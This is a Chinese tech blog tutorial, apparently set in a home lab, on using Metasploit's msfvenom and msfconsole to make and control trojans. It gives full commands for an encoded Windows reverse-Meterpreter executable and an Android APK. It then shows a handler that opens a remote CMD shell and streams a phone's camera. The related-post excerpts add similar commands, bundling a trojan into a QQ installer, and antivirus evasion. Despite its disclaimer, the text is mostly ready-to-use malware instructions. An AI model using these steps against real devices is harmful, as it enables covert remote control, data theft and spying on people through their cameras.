msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

最新推荐文章于 2024-08-08 10:32:49 发布
最新推荐文章于 2024-08-08 10:32:49 发布
阅读量6.3k 收藏 74
点赞数 5
分类专栏: # 渗透基础 文章标签: 安全 windows android 木马 Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/107661649
版权

文章目录

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、使用环境

  1. VMware V15.5.0
  2. Kali-Linux-2020.2
  3. msfconsole
  4. msfvenom
  5. Windows Server 2008 R2 Enterprise
  6. Android10 & EMUI10.1

二、msfvenom编写Trojan木马

在Kali的终端使用msfvenom命令制作后门木马程序

Ⅰ、电脑端.exe格式

在终端输入以下指令以生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST={Kali系统IP} LPORT={监听端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5
可选参数描述
-p使用平台
-e编码方式
-f文件格式
-o存储为
-i编译次数
-x捆绑软件

平台选择windows/meterpreter_reverse_tcp
在这里插入图片描述

Ⅱ、移动端.apk格式

msfvenom -p android/meterpreter_reverse_tcp R > /home/用户名/桌面/{文件名}.apk

平台选择android/meterpreter_reverse_tcp
保存方式与电脑端不同
在这里插入图片描述

三、msfconsole控制感染对象

两平台主要操作相同,区别在于参数

当在Windows中打开制作好的木马后,后门便会自动开放,程序后台静默运行
在Android打开后也是同理。安全软件会直接识别并报毒
在这里插入图片描述

在Kali终端使用msfconsole控制感染对象
加载exploit/multi/handler模块
在这里插入图片描述
设置载荷,Windows和Android的载荷与制作程序时输入的-p参数一致
windows/meterpreter_reverse_tcp
android/meterpreter_reverse_tcp

最后再设置LHOST和LPORT与程序的参数一致
指向Kali系统IP

配置完毕,run运行监听
在这里插入图片描述

Ⅰ、电脑端示例:shell获取Windows的CMD

在这里插入图片描述

Ⅱ、移动端示例:webcam_stream获取Android摄像头实时画面

在这里插入图片描述

提高警惕,切勿安装不明来源的程序软件

欢迎在评论区留言
感谢浏览

Ho1aAs
关注
专栏目录
msf生成木马攻击android手机
afei001
03-21 6681
实验环境 攻击机:kali IP:192.168.43.5 靶机:oppor9st 生成木马攻击android手机 1.在kali生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...
msfvenom制作windows/linux/android/ios木马
Cwillchris的博客
05-04 1952
msfvenom选项如下 -p, --payload<payload> 指定 payload(攻击荷载)。如果使用自定义payload,请使用'-'或者stdin指定。 -l, --list [module_typel列出指定模块的所有可用资源。模块类型包括:payloads, encoders, nops, all -n, --nopsled <length>为payload预先指定一个NOP滑动长度。 -f, --format <format>指定输出格式(使
Kali渗透-MSF木马免杀技术
热门推荐
道阻且长,行则将至。
03-27 2万+
裸奔木马 1、在 Kali 中直接使用 Msfvenom 生成木马文件,不做任何免杀处理,如下图所示: 2、在 Kali 开启 Apache 服务,同一局域网内的 Win 10 物理主机访问木马文件,尝试下载: 3、结果 Win 10 物理主机的火绒安全软件自动识别木马,并自动将其移除至病毒隔离区: 4、手动从病毒隔离区移出木马QQ.exe,上传至腾讯哈勃分析系统进行在线病毒识别分析,结果只是“轻...
使用msfveonm后门生成模块和msfconsole获取主机权限(windows
X1DD1Asad343的博客
06-05 331
运行(为了保证设置的参数的正确性,在运行前可以使用show options 命令检查对应参数是否设置正确)监听需要使用到msfconsole(MSF)中的exploit/multi/handler监听模块。配置相应参数(可以使用show options 命令查看参数情况)设置监听端口(在不设置监听端口的情况下,默认监听端口为4444)后门在目标设备上运行后,监听设备即可看到目标设备上线。获取shell,同时查看当前用户权限信息。设置监听主机(一般就是kali的IP)接下来可以尝试输入一些命令。
msfconsole生成安卓木马版本低
最新发布
mjy60的博客
08-08 423
打开AndroidManifest文件将 android:minSdkVersion="10"改为 android:minSdkVersion="16"android:targetSdkVersion="17" />改为 android:targetSdkVersion="23" />进入文件123中(我这里的名字是123)用vim打开AdnroidManifest.xml。在<application>标签上方添加标签上方添加。用apktool将文件反编译。
msfconsolemsfvenom大全kali
m0_73960954的博客
06-13 1118
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口。cat 读取文件内容到屏幕。meterpreter > execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2437
使用msfvenom生成木马控制手机
Msf 入侵安卓手机
weixin_30378311的博客
09-21 998
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...
我的MSFAndroid木马渗透的学习笔记
yuan_boss的博客
06-07 5108
使用kali制作Android木马并进行通讯录渗透的学习笔记
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 1885
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3988
msfvenom的使用
msfvenom生成木马攻击windows
afei001
03-25 1257
实验环境 攻击机:kali     IP:192.168.43.5 靶机:windows 生成木马攻击windows 1.在kali生成反弹木马 root@afei:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=55555 -f exe > test.exe [-] No pla...
使用msfvenom生成木马
Sylon的博客
08-27 3525
msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...
metasploit、msfvenom生成木马入侵电脑及手机
weixin_34205076的博客
06-11 1166
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --he...
msf木马程序
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 8394
Kali Linux使用MSF木马入侵安卓手机
msfvenom生成木马利用
zzlx123的博客
12-23 2286
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题。 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来解决。 0x00 关闭kali 0x01 点击编辑此虚拟机 0x02 将此处改为使用物理驱动器 0x03 再次开启虚拟机,等开启后选择安装Tools 0x04 他会自动进行安装,进入系统后打开文件...
利用MSF攻击Android
qq_45746768的博客
07-08 3862
利用Metasploit攻击Android
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值